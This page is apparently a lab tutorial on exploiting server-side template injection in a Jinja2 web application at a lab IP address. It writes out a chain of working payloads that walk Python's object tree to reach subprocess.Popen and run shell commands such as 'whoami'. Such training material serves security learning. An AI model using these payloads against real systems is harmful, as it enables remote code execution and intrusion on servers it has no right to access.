Exploitation

So now we know the following !

  • The application is vulnerable to SSTI

  • The injection point

  • The template engine

  • The template engine syntax

Since Jinja2 is a Python based template engine, we will look at ways to run shell commands in Python.

http://10.10.39.6:5000/profile/<div data-gb-custom-block data-tag="import"></div>{{ os.system("whoami") }}

The above payload fails because jinja2 is essentially a sub language of Python that doesn't integrate the import statement in the code block.

Python allows us to call the current class instance with .__class__, we can call this on an empty string and Classes in Python have an attribute called .__mro__ that helps us to climb the inherited object tree, Since we want the root object, we can access the second property .__mro__[1]

Objects in Python have a method called .__subclasses()__ that allows us to climb down the object tree

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()}}

Everythings SET ! - Now we just have to find an object that allows us to run shell commands !

If we look closely the output displayed is just a Python list, so we can access this by using its index

We can find the Subprocess.Popen class in the dump and we can access it by using it's index, which is 401 in this case, so now our payload would look something like this

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()[401]}}

The above payload essentially calls the Subprocess.Popen method, now all we have to do is invoke it

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()[401] ("whoami", shell=True, stdout=-1).communicate() }}
PreviousIndentificationNextXXE Attacks

Last updated